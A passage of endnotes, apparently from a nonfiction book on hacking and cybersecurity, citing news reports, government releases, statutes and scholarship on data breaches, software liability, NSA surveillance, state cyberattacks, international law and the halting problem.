keep pace with demand: “Over an eight-year period tracked by Cybersecurity Ventures, the number of unfilled cybersecurity jobs grew by 350 percent, from one million positions in 2013 to 3.5 million in 2021. For the first time in a decade, the cybersecurity skills gap is leveling off. Looking five years ahead, we predict the same number of openings in 2025”: “Cybersecurity Jobs Report,” Cybersecurity Ventures, November 11, 2021. See also Paulette Perhach, “The Mad Dash to Find a Cybersecurity Force,” The New York Times, November 7, 2018. Cybersecurity spending is estimated to be $1 trillion from 2017 to 2021: “Global Cybersecurity Spending Predicted to Exceed $1 Trillion from 2017–2021,” Cybercrime Magazine (blog), June 10, 2019, https://cybersecurityventures.com/cybersecurity-market-report/.
fled the country: Jane Arraf, “Russia Is Losing Tens of Thousands of Outward-Looking Young Professionals,” The New York Times, March 20, 2022; Masha Gessen, “The Russians Fleeing Putin’s Wartime Crackdown,” The New Yorker, March 20, 2022, https://www.newyorker.com/magazine/2022/03/28/the-russians-fleeing-putins-wartime-crackdown.
especially severe: Anthony Faiola, “Mass Flight of Tech Workers Turns Russian IT into Another Casualty of War,” The Washington Post, May 1, 2022.
“Fucking Visa”: Brian Krebs, Spam Nation (Naperville, IL: Sourcebooks, 2014), 251.
Bitcoin: For the original white paper, see the (pseudonymous) Satoshi Nakamoto, “Bitcoin: A Peer-to-Peer Electronic Cash System,” https://bitcoin.org/bitcoin.pdf.
“over-the-counter brokers: Connor Dempsey, “How Does Crypto OTC Actually Work?,” Circle Research, Medium, March 25, 2019, https://medium.com/circle-research/how-does-crypto-otc-actually-work-e2215c4bb13.
“surveillance capitalism”: Shoshana Zuboff, The Age of Surveillance Capitalism: The Fight for a Human Future at the New Frontier of Power (New York: PublicAffairs, 2019).
failed to patch: Dan Goodin, “Failure to Patch Two-Month-Old Bug Led to Massive Equifax Breach,” September 13, 2017, arstechnica.com/information-technology/2017/09/massive-equifax-breach-caused-by-failure-to-patch-two-month-old-bug. Attackers exploited Apache Struts CVE-2017-5638.
Marriott International: Peter Holley, “Marriott: Hackers Accessed More Than 5 Million Passport Numbers During November’s Massive Data Breach,” The Washington Post, January 4, 2019.
difficult to sue: American courts have made it difficult to sue software companies for data breaches by denying aggrieved victims “standing.” To have standing to sue, parties must allege that they have suffered a “legally cognizable injury.” Courts have been reluctant, however, to regard having one’s personal information available for sale on a cybercriminal forum treated as a legally cognizable injury, deeming it too speculative: Jeff Kosseff, Cybersecurity Law (Hoboken, NJ: John Wiley and Sons, 2017), 52–64. On the inadequacies of data security law more generally, see Solove and Hartzog, Breached!
corporate culture: Thomas Fox-Brewster, “A Brief History of Equifax Security Fails,” Forbes, September 8, 2017, https://www.forbes.com/sites/thomasbrewster/2017/09/08/equifax-data-breach-history/?sh=1d6e6259677c.
from banking fraud: Ross Anderson, “Why Cryptosystems Fail,” 1st Conference on Computer and Comm. Security ’93 (1993); Ross Anderson, Security Engineering: A Guide to Building Dependable Distributed Systems, 2nd ed. (Indianapolis: John Wiley & Sons, 2008), 341–43.
Equifax agreed to pay: “Equifax to Pay $575 Million as Part of Settlement with FTC, CFPB, and States Related to 2017 Data Breach,” press release, Federal Trade Commission, July 22, 2019, https://www.ftc.gov/news-events/news/press-releases/2019/07/equifax-pay-575-million-part-settlement-ftc-cfpb-states-related-2017-data-breach.
Facebook agreed to pay: “FTC Imposes $5 Billion Penalty and Sweeping New Privacy Restrictions on Facebook,” press release, Federal Trade Commission, July 24, 2019, https://www.ftc.gov/news-events/news/press-releases/2019/07/ftc-imposes-5-billion-penalty-sweeping-new-privacy-restrictions-facebook.
“monitoring and patching practices”: Jane Chong, “The Challenge of Software Liability,” Lawfare, April 6, 2020, https://www.lawfareblog.com/challenge-software-liability.
“affecting commerce”: Section 5 of the Federal Trade Commission Act (FTC Act), chap. 311, §5, 38 Stat. 719, codified at 15 USC §45(a).
computer by an intermediary: Chong, “Challenge of Software Liability.”
for unsafe vehicles: Jane Chong, “Bad Code: The Whole Series,” Lawfare, November 4, 2013, https://www.lawfareblog.com/bad-code-whole-series.
“accident-proof or foolproof”: Evans v. General Motors Corporation, No. 359 F.2d 822, U.S. 7th Circuit, April 15, 1966.
trusted SolarWinds: Cozy Bear launched another supply-chain attack, placing malware in Microsoft Office copies sold by resellers. It also compromised the authentication system used by Microsoft and VMWare, the largest developer of virtualization software, allowing hackers to exfiltrate emails and documents from affected systems. See Thomas Brewster, “DHS, DOJ and DOD Are All Customers of SolarWinds Orion, the Source of the Huge US Government Hack,” Forbes, December 14, 2020, https://www.forbes.com/sites/thomasbrewster/2020/12/14/dhs-doj-and-dod-are-all-customers-of-solarwinds-orion-the-source-of-the-huge-us-government-hack/?sh=20fce79d25e6.
“old-fashioned deterrence”: Anne Gearan, Karoun Demirjian, Mike DeBonis, and Annie Linskey, “Biden and Lawmakers Raise Alarms Over Cybersecurity Breach Amid Trump’s Silence,” The Washington Post, December 17, 2020.
OFAC freezing the assets: Executive order: https://www.whitehouse.gov/briefing-room/presidential-actions/2021/04/15/executive-order-on-blocking-property-with-respect-to-specified-harmful-foreign-activities-of-the-government-of-the-russian-federation/. OFAC notice: https://home.treasury.gov/news/press-releases/jy0126.
supply-chain attack: On the effort to increase supply-chain security, see White House, “Executive Order on America’s Supply Chains,” February 24, 2021, https://www.whitehouse.gov/briefing-room/presidential-actions/2021/02/24/executive-order-on-americas-supply-chains/, and White House, “Executive Order on America’s Supply Chains: A Year of Action and Progress,” https://www.whitehouse.gov/wp-content/uploads/2022/02/Capstone-Report-Biden.pdf.
Cisco routers sold to foreign countries: Glenn Greenwald, “How the NSA Tampers with US-Made Internet Routers,” The Guardian, May 12, 2014.
“And frankly we have more capacity”: Simon Sharwood, “Obama says USA Has World’s Biggest and Best Cyber Arsenal,” The Register, September 6, 2016, https://www.theregister.com/2016/09/06/obama_says_usa_has_worlds_biggest_and_best_cyber_arsenal.
The Echelon program: James Bamford, The Shadow Factory: The NSA from 9/11 to Eavesdropping on America (New York: Anchor, 2009), 14–16.
Crypto AG: Greg Miller, “The Intelligence Coup of the Century,” The Washington Post, February 11, 2020.
for close to two decades: See Adam Segal, “From TITAN to BYZANTINE HADES: Chinese Cyber Espionage,” in A Fierce Domain: Conflict in Cyberspace, 1986 to 2012, ed. Jason Healey (Vienna, VA: Cyber Conflict Studies Association, 2013).
F-35 fighter: Justin Ling, “Man Who Stole F-35 Secrets to China Pleads Guilty,” Vice, March 24, 2016, https://www.vice.com/en/article/kz9xgn/man-who-sold-f-35-secrets-to-china-pleads-guilty.
Office of Personnel Management: Ellen Nakashima, “Hacks of OPM Databases Compromised 22.1 Million People, Federal Authorities Say,” The Washington Post, July 9, 2015.
“There are two kinds”: Scott Pelley, “FBI Director on the Threat of ISIS, Cybercrime,” 60 Minutes, October 4, 2014, https://www.cbsnews.com/news/fbi-director-james-comey-on-threat-of-isis-cybercrime/.
signed a historic agreement: White House, Office of the Press Secretary, “FACT SHEET: President Xi Jinping’s State Visit to the United States,” September 15, 2015, https://obamawhitehouse.archives.gov/the-press-office/2015/09/25/fact-sheet-president-xi-jinpings-state-visit-united-states.
abided by this agreement: Prepared statement of Kevin Mandia, CEO of FireEye, Inc., before the U.S. Senate Select Committee on Intelligence, March 30, 2017, https://www.intelligence.senate.gov/sites/default/files/documents/
os-kmandia-033017.pdf.
FISA warrant to surveil Carter Page: “In re Carter Page, a US Person,” Docket Number: 16-11B2, https://www.judiciary.senate.gov/imo/media/doc/FISA%20Warrant%20Application%20for%20Carter%20Page.pdf.
makes it a felony: 50 USC §1809.
Snowden as a hero: According to a Gallup poll conducted from June 10 to 11, 2013, Americans were split on Snowden, with 44 percent agreeing with his action, and 42 percent disagreeing. See Frank Newport, “Americans Disapprove of Government Surveillance Programs,” Gallup, June 12, 2013, https://news.gallup.com/poll/163043/americans-disapprove-government-surveillance-programs.aspx.
any kind of hack: See Rebecca Riffkin, “Hacking Tops List of Crimes Americans Worry About Most,” Gallup, October 27, 2014, https://news.gallup.com/poll/178856/hacking-tops-list-crimes-americans-worry.aspx.
The Guardian: Glenn Greenwald, “NSA Collecting Phone Records of Millions of Verizon Customers Daily,” The Guardian, June 6, 2013, https://www.theguardian.com/world/2013/jun/06/nsa-phone-records-verizon-court-order. The Guardian article at this link says that the Verizon metadata article was published on June 6, but the archived version of the article shows that it was published the day before: https://web.archive.org/web/20130801184126/https://www.
theguardian.com/world/2013/jun/06/nsa-phone-records-verizon-court-order.
June 6, 2013: Barton Gellman and Laura Poitras, “U.S., British Intelligence Mining Data from Nine U.S. Internet Companies in Broad Secret Program,” The Washington Post, June 7, 2013; Glenn Greenwald and Ewan MacAskill, “NSA Prism Program Taps into User Data of Apple, Google, and Others,” The Guardian, June 7, 2013, https://www.theguardian.com/world/2013/jun/06/us-tech-giants-nsa-data.
Pulitzer Prize: Gellman and Greenwald have publicly disputed priority over the Snowden scoops. See Mackenzie Weinger, “Gellman, Greenwald Feud over NSA,” Politico, June 10, 2013, https://www.politico.com/story/2013/06/edward-snowden-nsa-leaker-glenn-greenwald-barton-gellman-092505.
“largest in American history”: Chris Strohm and Del Quentin Wilber, “Pentagon Says Snowden Took Most U.S. Secrets Ever: Rogers,” Bloomberg, January 9, 2014, https://www.bloomberg.com/news/articles/2014-01-09/pentagon-finds-snowden-took-1-7-million-files-rogers-says.
bulk collection: As one might expect from a secret court in which only the government appears, the FISC’s rulings tend to follow the government’s interpretation of the law. As Orin Kerr has commented on an opinion that gave the government the expansive right to bulk-collect internet metadata, “By imagining that the statute provides more protection than it does, and by then construing the ambiguity in the statute in the government’s favor, the FISC’s opinion ends up approving a program that Congress did not contemplate using privacy protections Congress did not contemplate either. The resulting opinion endorses a program that appears to be pretty far from the text of the statute”: Orin Kerr, “Problems with the FISC’s Newly-Declassified Opinion on Bulk Collection of Internet Metadata,” Lawfare, November 13, 2013, https://www.lawfareblog.com/problems-fiscs-newly-declassified-opinion-bulk-collection-internet-metadata.
criticized the surveillance practices: See Jack Goldsmith, Power and Constraint: The Accountability Presidency After 9/11 (New York: Norton, 2012), 3–22.
Washington, D.C.: For a detailed description of the FISC procedures in 2013, see “Letter to Chairman Leahy,” Committee on the Judiciary, U.S. Senate, July 29, 2013, https://www.fisc.uscourts.gov/sites/default/files/Leahy.pdf.
kept secret: John Shiffman and Kristina Cooke, “The Judges Who Preside Over America’s Secret Court,” Reuters, June 21, 2013, https://www.reuters.com/article/us-usa-security-fisa-judges/the-judges-who-preside-over-americas-secret-court-idUSBRE95K06H20130621.
“this law means”: “In Speech, Wyden Says Official Interpretations of Patriot Act Must Be Made Public,” United States Senate, May 26, 2011, https://www.wyden.senate.gov/news/press-releases/in-speech-wyden-says-official-interpretations-of-patriot-act-must-be-made-public.
perhaps intentionally so: Charlie Savage, Power Wars: A Relentless Rise of Presidential Authority (New York: Back Bay, 2015), 174.
Laura Poitras’s riveting documentary: Laura Poitras, Citizenfour (2014).
one party outside: 50 USC §1881a, often known as Section 702 of the FISA Amendments Act (2008).
not because the NSA told us: The Office of the Director of National Intelligence has since published a helpful infographic: https://www.dni.gov/files/icotr/Section702-Basics-Infographic.pdf.
telephone metadata: Charlie Savage, “Disputed N.S.A. Phone Program Is Shut Down, Aide Says,” The New York Times, March 4, 2019.
search the email messages: Charlie Savage, “N.S.A. Halts Collection of Americans’ Emails About Foreign Targets,” The New York Times, April 28, 2017.
now made public: 50 USC §1872 (a).
Advocates: 50 USC §1803(i)(2).
annual statistics: 50 USC §1873.
Richard Clarke published: Richard Clarke and Robert Knake, Cyber War (New York: Ecco, 2010), 67. For a contrary view, see Thomas Rid, “Cyber War Will Not Take Place,” Journal of Strategic Studies 35 (2012): 1.
apply it to cyberwar: On the history of cyber-conflict, see Healey, A Fierce Domain; Fred Kaplan, Dark Territory: The Secret History of Cyber War (New York: Simon and Schuster, 2016); Ben Buchanan, The Hacker and the State: Cyber Attacks and the New Normal of Geopolitics (Cambridge, MA: Harvard University Press, 2020); Adam Segal, The Hacked World Order: How Nations Fight, Trade, Maneuver, and Manipulate in the Digital Age (New York: Public Affairs, 2015); Kim Zetter, Countdown to Zero Day (New York: Crown, 2014); Andy Greenberg, Sandworm (New York: Doubleday, 2019).
Stuxnet: Zetter, Countdown to Zero Day.
monocultures are at serious risk: Paul Rosenzweig, “The Cyber Monoculture Risk,” Lawfare, October 1, 2021, https://www.lawfareblog.com/cyber-monoculture-risk.
In a federal system: By the same reasoning, we should expect, all other things being equal, digital homogeneity in the federal government. See Tim Banting and Matthew Short, “Monoculture and Market Share: The State of Communications and Collaboration Software in the US Government,” September 21, 2021, https://omdia.tech.informa.com/-/media/tech/omdia/marketing/
commissioned-research/pdfs/monoculture-and-market-share-the-state-of-communications-and-collaboration-software-in-the-us-government-v3.pdf?rev=8d41cc2d16de491b9f59d2906309fdaa.
pay their taxes: Naveen Goud, “Ukraine’s Accounting Software Firm Refuses to Take Cyber Attack Blame,” Cybersecurity Insiders, 2011, https://www.cybersecurity-insiders.com/ukraines-accounting-software-firm-refuses-to-take-cyber-attack-blame; David Maynord, Aleksandar Nikolic, Matt Olney, and Yves Younan, “The MeDoc Connection,” Talos Intelligence, July 5, 2017, and https://blog.talosintelligence.com/2017/07/the-medoc-connection.html.
In 1974: James Scott, Weapons of the Weak (New Haven, CT: Yale University Press, 1985).
“foot dragging”: Scott, Weapons, 30.
hack on Sony: David E. Sanger and Nicole Perlroth, “U.S. Links North Korea to Sony Hacking,” The New York Times, December 17, 2014.
DDoS-ed banks: Nicole Perlroth, “Attacks on 6 Banks Frustrate Customers,” The New York Times, September 30, 2012.
indicted in 2016: Department of Justice, “Seven Iranians Working for Islamic Revolutionary Guard Corps–Affiliated Entities Charged for Conducting Coordinated Campaign of Cyber Attacks Against U.S. Financial Sector,” press release, March 24, 2016, https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged; United States v. Ahmad Fathi, Hamid Firoozi, Amin Shokoshi, Sadegh Ahmadzadegan, a/k/a “Nitr0jen26,” Omid Ghaffarinia, a/k/a “PLuS,” Sina Keissar, and Nader Saedi, a/k/a “Turk Server,” 16 Crim 48, https://www.justice.gov/opa/file/834996/download.
Shamoon: Nicole Perlroth, “Cyberattack on Saudi Firm Disquiets U.S.,” The New York Times, October 23, 2012.
Nomenklatura: Nomenklatura went after the File Allocation Table, not the Master Boot Record, but the idea is the same: corrupting the disk’s index, its mapping between physical space and digital information, to render the indexed information unavailable.
Cyber Partisans: Ylenia Gostoli, “How I Became the Spokesperson for a Secretive Belarusian ‘Hacktivist’ Group,” TRTWorld, February 10, 2022, https://www.trtworld.com/magazine/how-i-became-the-spokesperson-for-a-secretive-belarusian-hacktivist-group-54617. On hacktivism more generally, see Coleman, Hacker, Hoaxer, Whistleblower, Spy.
servers of the Belarusian railway: Sergui Gatlan, “Hackers Say They Encrypted Belarusian Railway Servers in Protest,” Bleeping Computer, January 24, 2022, https://www.bleepingcomputer.com/news/security/hackers-say-they-encrypted-belarusian-railway-servers-in-protest/.
Russia employed cyberattacks: Thomas Rid, “Why You Haven’t Heard About the Secret Cyberwar in Ukraine,” The New York Times, March 18, 2022; Matt Burgess, “A Mysterious Satellite Hack Has Victims Far Beyond Ukraine,” Wired, March 23, 2022, https://www.wired.com/story/viasat-internet-hack-ukraine-russia/.
World War II: According to Article 2, Section 4, of the United Nations Charter, every member is prohibited from the “threat or use of force against the territorial integrity or political independence of any State.” United Nations Charter, Article 2(4). Article 51 makes an exception for self-defense. Under Chapter VII, the United Nations Security Council has the power to authorize military action for the sake of “international peace and security.”
The Internationalists: Oona A. Hathaway and Scott J. Shapiro, The Internationalists: How a Radical Plan to Outlaw War Remade the World (New York: Simon and Schuster, 2017).
new canteens: Oona A. Hathaway et al., “The Law of Cyber-Attack,” California Law Review 100 (2012): 817.
The preamble to the United Nations Charter: U.N. Charter, Preamble.
They were not: On the history of American interference in other countries’ elections, see Dov Levin, Meddling in the Ballot Box: The Causes and Effects of Partisan Electoral Interventions (Oxford: Oxford University Press, 2020); David Shimer, Rigged: America, Russia and One Hundred Years of Electoral Interference (New York: Knopf, 2020).
“norm of noninterference”: Oppenheim’s International Law, vol. 1: Peace, ed. Robert Jennings and Arthur Watts (9th ed., 1996), 428. Cf. Anthony D’Amato, “There Is No Norm of Intervention or Non-Intervention in International Law: Comments,” International Legal Theory (2001): 33–40. On the application of the Norm of Non-Intervention to cyberattacks, see Jens David Ohlin, Election Interference: International Law and the Future of Democracy (New York: Cambridge University Press, 2020); Harriet Moynihan, “The Application of International Law to State Cyberattacks: Sovereignty and Non-Intervention,” Section 3, https://www.chathamhouse.org/2019/12/application-international-law-state-cyberattacks/3-application-non-intervention-principle.
UKUSA agreement: U.S. State Army Navy, “Britain-US Communication Intelligence Agreement,” March 5, 1946. United States Treaties and Other International Agreements.
“The NSA does NOT”: Laura Poitras et al., “How the NSA Targets Germany and Europe,” Spiegel International, July 1, 2013, https://www.spiegel.de/international/world/secret-documents-nsa-targeted-germany-and-eu-buildings-a-908609.html.
Henry Stimson: Olga Khazan, “Gentlemen Reading Each Others’ Mail: A Brief History of Diplomatic Spying,” The Atlantic, June 17, 2013, https://www.theatlantic.com/international/archive/2013/06/
gentlemen-reading-each-others-mail-a-brief-history-of-diplomatic-spying/276940/.
Turing’s proof: The proof presented here is different from Turing’s as set out in “On Computable Numbers” because his machines never halted. They ran forever. The exposition in the text follows the modern convention, first developed by Stephen Kleene in 1941, of using Turing Machines that halt. See generally Charles Petzold, “Turing and the Halting Problem,” Charles Petzold (blog), November 26, 2007, https://www.charlespetzold.com/blog/2007/11/Turing-Halting-Problem.html.
proof by contradiction: Here’s an example: To prove that the Tortoise is mortal, assume that the Tortoise is a reptile, all reptiles are mortal, but the Tortoise is immortal. If the Tortoise is immortal, then it can’t be a reptile because all reptiles are mortal. But the Tortoise is a reptile. Contradiction.
decidable problems are the exception: As Rice would later show, all non-trivial semantic properties of programs—properties about how programs behave—not just halting, are undecidable. H.G. Rice, “Classes of Recursively Enumerable Sets and Their Decision Problems,” Transactions of the American Mathematical Society 74, no. 2 (1953): 358.
Finally convinced: It’s my book, so I get to say that the imaginary student is convinced by my brilliant teaching.